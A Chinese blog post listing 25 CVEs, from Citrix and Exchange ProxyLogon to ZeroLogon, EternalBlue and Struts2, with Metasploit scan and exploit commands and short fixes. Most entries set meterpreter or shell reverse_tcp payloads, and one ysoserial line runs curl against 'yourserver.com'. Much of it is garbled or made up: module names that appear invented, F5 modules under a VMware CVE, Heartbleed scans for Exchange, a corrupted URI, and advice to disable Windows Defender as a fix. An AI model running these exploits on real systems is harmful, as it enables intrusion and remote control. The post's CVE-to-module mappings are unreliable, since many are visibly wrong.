msf提权漏洞利用总结


1.CVE-2019-19781 Citrix漏洞

(1)漏洞检测或者扫描方法:

使用Nmap或Metasploit的citrix_enum模块进行扫描。

# 使用Nmap扫描nmap -p 80,443 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/citrix_enumset RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的citrix_adc_cve_2019_19781模块进行利用。

use exploit/linux/http/citrix_adc_cve_2019_19781set RPORT 443set TARGETURI /vpn/set USERNAME <username>set PASSWORD <password>1.2.3.4.5.

(3)详细的修复办法:

下载v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway软件更新,或禁用易受攻击的目录遍历服务URL路径。

2.CVE-2019-11510 Pulse Secure VPN漏洞

(1)使用Nmap扫描目标主机开放的443端口,也可以使用Metasploit的http_pulsesecure_traversal模块进行扫描。

nmap --script ssl-heartbleed -p 443 <target_IP>use auxiliary/scanner/http/pulsesecure_traversal1.2.

(2)使用Metasploit的pulsesecure_cmd_exec模块进行利用。

use exploit/linux/http/pulsesecure_cmd_execset SSL trueset TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl1.2.3.

(3)漏洞修复

使用Pulse Secure发布的最新软件更新修补此漏洞,还需同时修改密码和密钥,以增强安全性。

3.CVE-2020-5902 F5 BIG-IP漏洞

(1)使用Nmap扫描目标主机开放的443端口,也可以使用Metasploit的http_f5_bigip_check模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script http-vuln-cve2020-5902 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/http_f5_bigip_checkset RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的f5_bigip_tmsh_rce模块进行利用。

use exploit/unix/http/f5_bigip_tmsh_rceset RHOSTS <target_IP>set RPORT 443set TARGETURI /tmsh/tmshCmd.jsp
run1.2.3.4.5.

(3)详细的修复办法:

立即升级到最新版本的BIG-IP软件,最新版本中包含了对此漏洞的修补。

4.CVE-2021-21972 VMware vSphere Client漏洞

(1)使用Nmap扫描目标主机,检查TCP 443端口是否开放。也可以使用Metasploit的vmware_vcenter_login模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script http-vuln-cve2021-22986 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/f5_bigip_cookieset RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的f5_bigip_restapi_rce模块进行利用。

use exploit/linux/http/f5_bigip_restapi_rceset RHOSTS <target_IP>set TARGETURI /mgmt/tm/util/bashset PASSWORD <password>set USERNAME <username>run1.2.3.4.5.6.

(3)详细的修复办法:

立即升级F5 BIG-IP软件的最新版本,另外,管理员还要加强密码策略和网络安全设置。

5.CVE-2021-26855 Exchange漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机,检查TCP 443端口是否开放。也可以使用Metasploit的http_enum模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script ssl-heartbleed <target_IP># 使用Metasploit模块use auxiliary/scanner/http/http_enumset RHOSTS <target_IP>set RPORT 443run1.2.3.4.5.6.7.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的microsoft_exchange_server_proxylogon模块进行利用。

use exploit/windows/http/microsoft_exchange_server_proxylogonset RHOSTS <target_IP>set USERNAME <username>set PASSWORD <password>set PAYLOAD windows/x64/meterpreter/reverse_tcp
run1.2.3.4.5.6.

(3)详细的修复办法:

立即升级Exchange软件的最新版本,或使用Microsoft发布的补丁来修复此漏洞。

6.CVE-2020-1472 ZeroLogon漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机开放的SMB服务端口,如果开放了445或139端口,则可能存在此漏洞。也可以使用Metasploit中的smb_version模块进行扫描。

# 使用Nmap扫描nmap -p 445,139 --script smb-vuln-ms17-010 <target_IP># 使用Metasploit模块use auxiliary/scanner/smb/smb_versionset RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的cve_2020_1472_zerologon模块进行利用。

use exploit/windows/smb/cve_2020_1472_zerologonset RHOSTS <target_IP>set SMBDomain <domain_name>set SMBUser <username>set SMBPass <password>run1.2.3.4.5.6.

(3)详细的修复办法:

使用Microsoft发布的补丁修复此漏洞,或者将DCs升级到最新版本。

7.CVE-2021-34527 PrintNightmare漏洞

(1)漏洞检测或者扫描方法:

使用PowerShell脚本进行检测:

Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List1.

使用Microsoft提供的补丁测试工具进行漏洞检测:

# Windows Server 2019/Windows 10 Version 1809 or later.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll# Windows Server 2012/Windows 8 through earlier versions.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll -VerifySignature 01.2.3.4.

(2)漏洞详细利用方法及步骤参考:

使用PowerShell脚本进行利用:

$code = @'
using System;using System.Runtime.InteropServices;public class HelloWorld {
   public static void Main() {
       string cmd = "calc.exe";
       NativeMethods.WinExec(cmd, 0);
   }}internal static class NativeMethods {
   [DllImport("kernel32")]
   public static extern int WinExec(string cmd, int nCmdShow);}'@
Add-Type $code[HelloWorld]::Main()1.2.3.4.5.6.7.8.9.10.11.12.13.14.15.16.17.18.

使用Metasploit的windows/local/ntprint_smb模块进行利用:

use exploit/windows/local/ntprint_smbset PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST <attack_IP>set RHOSTS <target_IP>run1.2.3.4.5.

(3)详细的修复办法:

Microsoft已经发布了安全更新程序,建议用户尽快升级到最新版并关闭Windows打印机共享服务。此外,也可以通过策略或命令行的方式禁用Windows打印机共享服务,或者限制用户对打印机共享的访问来减少攻击面。

8.CVE-2021-21985 vSphere Client漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的vmware_vcenter_upload_file模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script http-vuln-cve2021-21985 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/vmware_vcenter_upload_fileset RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的vmware_vcenter_server_rce模块进行利用。

use exploit/linux/http/vmware_vcenter_server_rceset RHOSTS <target_IP>set USERNAME <username>set PASSWORD <password>run1.2.3.4.5.

(3)详细的修复办法:

VMware官方发布了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程序来修复此漏洞,管理员可以下载并安装最新版本的软件来修补此漏洞。

9.CVE-2021-31166 IIS漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机的HTTP服务,也可以使用Metasploit的http_iis_webdav_upload_asp模块进行扫描。

# 使用Nmap扫描nmap -p80 --script http-vuln-cve2021-31166 <target_IP># 使用Metasploit模块use exploit/windows/http/iis_webdav_upload_aspset RHOSTS <target_IP>set RPORT 80set SSL falseset TARGETURI /webdav/test.txt
run1.2.3.4.5.6.7.8.9.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的http_iis_webdav_payload模块进行利用。

use exploit/windows/http/iis_webdav_payloadset RHOSTS <target_IP>set VHOST <host_header>set LHOST <local_IP>run1.2.3.4.5.

(3)详细的修复办法:

下载并安装最新版本的IIS软件更新来修补此漏洞,或者在服务器上禁用WebDAV协议。

10.CVE-2021-1636 Windows Defender漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了Windows Defender的远程管理端口5985,也可以使用Metasploit的windows/local/ms-windefender-bypass模块进行扫描。

# 使用Nmap扫描nmap -p 5985 <target_IP># 使用Metasploit模块use exploit/windows/local/ms-windefender-bypassset LPORT <local_port>set PAYLOAD windows/x64/meterpreter/reverse_tcp
run1.2.3.4.5.6.7.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的windows/local/ms-windefender-bypass-exe模块进行利用。

use exploit/windows/local/ms-windefender-bypass-exeset LHOST <local_IP>set LPORT <local_port>set PAYLOAD windows/x64/meterpreter/reverse_tcp
run1.2.3.4.5.

(3)详细的修复办法:

立即安装微软发布的最新累积更新,或者手动禁用Windows Defender。

11.CVE-2021-22893 Fortinet SSL VPN漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了Fortinet SSL VPN的HTTPS服务,也可以使用Metasploit的http_fortinet_upload_exec模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script ssl-heartbleed <target_IP># 使用Metasploit模块use auxiliary/scanner/http/fortinet_upload_execset RHOSTS <target_IP>set RPORT 443set SSL true
run1.2.3.4.5.6.7.8.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的fortinet_sslvpn_webauth_form_cmd_exec模块进行利用。

use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_execset RHOSTS <target_IP>set RPORT 443set TARGETURI /remote/login?lang=enset SSL true
run1.2.3.4.5.6.

(3)详细的修复办法:

将Fortinet SSL VPN升级到最新版本并检查配置是否正确,确保安装了所有推荐的组件和补丁。

12.CVE-2021-21972 vSphere Client漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21972模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script http-vuln-cve2021-21972 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972set RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的vmware_vcenter_js_fckeditor模块进行利用。

use exploit/linux/http/vmware_vcenter_js_fckeditorset RHOSTS <target_IP>set TARGETURI /fckeditor/editor/filemanager/connectors/test.html
run1.2.3.4.

(3)详细的修复办法:

立即升级vCenter Server,vSphere Client和ESXi软件,或者使用VMware发布的补丁并重新部署系统。

13.CVE-2021-21979 vCenter Server漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21979模块进行扫描。

# 使用Nmap扫描nmap -p 443 --script http-vuln-cve2021-21979 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979set RHOSTS <target_IP>run1.2.3.4.5.6.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的vmware_vcenter_server_appliance_rce模块进行利用。

use exploit/linux/http/vmware_vcenter_server_appliance_rceset RHOSTS <target_IP>set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileCnotallow=1?path=/var/log/vmware/vsan-health/*run1.2.3.4.

(3)详细的修复办法:

下载并安装VMware发布的最新版本的软件更新,或者使用VMware发布的补丁修复此漏洞。

14.CVE-2021-22879 SonicWall VPN漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否开放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest模块进行扫描。

# 使用Nmap扫描nmap -p 443,8443 --script http-vuln-cve2021-20016 <target_IP># 使用Metasploit模块use auxiliary/scanner/http/sonicwall_sslvpntestset RHOSTS <target_IP>set RPORT 443set SSL true
run1.2.3.4.5.6.7.8.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的sonicwall_netextender_rce模块进行利用。

use exploit/linux/http/sonicwall_netextender_rceset RHOSTS <target_IP>set RPORT 443set SSL true
run1.2.3.4.5.

(3)详细的修复办法:

下载并安装最新版本的SonicWall NetExtender客户端,或者升级到最新版本的SonicWall SMA和Firewall软件。

15.CVE-2017-0144 EternalBlue漏洞

(1)漏洞检测或者扫描方法:

使用Nmap进行端口扫描,或使用Metasploit的ms17_010_eternalblue模块进行扫描。

使用Nmap扫描

nmap -sV --script smb-vuln-ms17-010 <target_IP>1.

使用Metasploit模块

use exploit/windows/smb/ms17_010_eternalblueset RHOSTS <target_IP>set SMBPIPE <smb_pipe_name>run1.2.3.4.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的windows/shell/reverse_tcp模块进行反向Shell连接。

use exploit/multi/handlerset PAYLOAD windows/shell/reverse_tcpset LHOST <local_IP>set LPORT <local_port>run1.2.3.4.5.

(3)详细的修复办法:

立即安装微软发布的最新安全更新或累积更新,或禁用不必要的SMBv1协议。

16.CVE-2019-18935 Citrix ADC漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否存在Citrix ADC,或使用Citrix提供的cxcheck.c脚本进行单个主机扫描。

使用Nmap扫描

nmap -p 80,443 <target_IP>1.

使用cxcheck.c脚本进行单个主机扫描

gcc cxcheck.c -lpthread -o cxcheck./cxcheck <target_IP>1.2.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的citrix_adc_cve_2019_19781_directory_traversal模块进行利用。

use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversalset RHOSTS <target_IP>set SRVHOST <local_IP>run1.2.3.4.

(3)详细的修复办法:

下载并安装Citrix发布的安全更新补丁,或通过网络隔离等措施进行防范。

17.CVE-2020-14750 Oracle WebLogic Server漏洞

(1)漏洞检测或者扫描方法:

使用Nmap扫描目标主机是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec模块进行扫描。

使用Nmap扫描

nmap -p 7001,7002 --script=oracle-tns-version <target_IP>1.

使用Metasploit模块

use exploit/multi/http/weblogic_ssrfset RHOSTS <target_IP>run1.2.3.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/multi/http/weblogic_ssrf_advise_poc模块进行利用。

use exploit/multi/http/weblogic_ssrf_advise_pocset RHOSTS <target_IP>run1.2.3.

(3)详细的修复办法:

下载并安装Oracle发布的最新安全更新补丁,或通过网络隔离等措施进行防范,如配置WebLogic防火墙、禁用未使用的组件等措施。同时,建议实现强身份验证,并将系统域名与其他软件绑定在一起以保护WebLogic服务器,避免利用URL入侵漏洞。

18.CVE-2020-0796 SMBv3 Ghost漏洞

(1)漏洞检测或者扫描方法:

使用Nmap进行端口扫描,或使用Metasploit的smb2_compression_zero模块进行扫描。

使用Nmap扫描

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796 <target_IP>1.

使用Metasploit模块

use auxiliary/scanner/smb/smb2_compression_zeroset RHOSTS <target_IP>set RPORT 445run1.2.3.4.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的windows/smb/smbv3_client_reliable_dialect_leak模块进行利用。

use exploit/windows/smb/smbv3_client_reliable_dialect_leakset RHOSTS <target_IP>set SMBPIPE <smb_pipe_name>run1.2.3.4.

(3)详细的修复办法:

尽快安装微软发布的补丁,禁用不必要的SMBv3协议或进行防火墙限制,以及限制网络流量从外部接入。

19.Shiro反序列化漏洞(CVE-2020-13933)

(1)漏洞检测或扫描方法:

使用ysoserial工具生成payload,发送到目标Shiro服务器并观察是否触发了漏洞。

使用ysoserial工具生成payload

java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base641.

发送payload到目标服务器并观察是否触发漏洞

(2)漏洞详细利用方法及步骤参考:

使用msfvenom生成payload,然后使用Metasploit的multi/http/shiro_default_password_exec模块进行利用。

使用msfvenom生成payload

msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -o payload.bin1.

使用Metasploit的模块进行攻击

use exploit/multi/http/shiro_default_password_execset RHOSTS <target_IP>set TARGETURI /xxxset PAYLOADFILE payload.binrun1.2.3.4.5.

(3)详细的修复办法:

升级Apache Shiro版本,禁止使用未授权的功能。

20.Struts2-032远程代码执行漏洞(CVE-2016-3087)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>1.

使用Struts2-Scan脚本

python struts-pwn.py -u http://<target_IP>/index.action -c "command"struts-pwn:https://github.com/mazen160/struts-pwn1.2.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/multi/http/struts2_code_exec_showcase模块进行利用。

use exploit/multi/http/struts2_code_exec_showcaseset RHOSTS <target_IP>set TARGETURI /struts2-showcase/run1.2.3.4.

(3)详细的修复办法:

升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据。

21.Struts2-045远程代码执行漏洞(CVE-2017-5638)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>1.

使用Struts2-Scan脚本

python struts-pwn-CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"1.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl模块进行利用。

use exploit/multi/http/struts2_content_type_ognlset RHOSTS <target_IP>set TARGETURI /struts2-showcase/run1.2.3.4.

(3)详细的修复办法:

升级至最新版本的Struts2,限制上传文件类型,加强日志监控。

22.Struts2-053远程代码执行漏洞(CVE-2017-5638)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -sV --script http-vuln-cve2017-5638 <target_IP>1.

使用Struts2-Scan脚本

python struts-pwn_CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan1.2.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/multi/http/struts2_content_type_ognl模块进行利用。

use exploit/multi/http/struts2_content_type_ognlset RHOSTS <target_IP>set TARGETURI /struts2-showcase/run1.2.3.4.

(3)详细的修复办法:

升级至最新版本的Struts2,限制上传文件类型,加强日志监控。

23.Struts2-061远程代码执行漏洞(CVE-2020-17530)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -sV --script http-vuln-cve2020-17530 <target_IP>1.

使用Struts2-Scan脚本

python3 Struts2_061_scanner.py -u http://<target_IP>/ -c "touch hack.txt"1.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/linux/http/struts2_namespace_ognl模块进行利用。

use exploit/linux/http/struts2_namespace_ognlset RHOSTS <target_IP>set TARGETURI /struts2-showcase/run1.2.3.4.

(3)详细的修复办法:

升级至最新版本的Struts2,加强输入校验和过滤,限制系统命名空间。

24.Struts2-016远程代码执行漏洞(CVE-2013-2251)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>1.

使用Struts2-Scan脚本

python struts-pwn-CVE-2013-2251.py -u http://<target_IP>/index.action -c "command"1.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/multi/http/struts_code_exec_class模块进行利用。

use exploit/multi/http/struts_code_exec_classset RHOSTS <target_IP>set TARGETURI /struts2-showcase/example/HelloWorld.actionset CMD <command_to_execute>run1.2.3.4.5.

(3)详细的修复办法:

升级至最新版本的Struts2,限制访问权限和用户输入数据,加强异常处理。

25.Struts2-037远程代码执行漏洞(CVE-2016-3081)

(1)漏洞检测或扫描方法:

使用Nmap和Struts2-Scan脚本进行扫描。

使用Nmap扫描

nmap -p 80,443 --script http-vuln-struts2 <target_IP>1.

使用Struts2-Scan脚本

python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"1.

(2)漏洞详细利用方法及步骤参考:

使用Metasploit的exploit/multi/http/struts_dmi_exec模块进行利用。

use exploit/multi/http/struts_dmi_execset RHOSTS <target_IP>set TARGETURI /struts2-showcase/run1.2.3.4.

(3)详细的修复办法:

升级至最新版本的Struts2,禁用不必要的功能,过滤用户输入数据。此漏洞也可以通过在web.xml文件中配置一个安全过滤器来修复。


操作系统性能提升之内核锁优化
上一篇 2023年06月15日
没有人能真正精通C++
下一篇 2023年06月15日
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 88888888@qq.com 举报,一经查实,本站将立刻删除。

相关推荐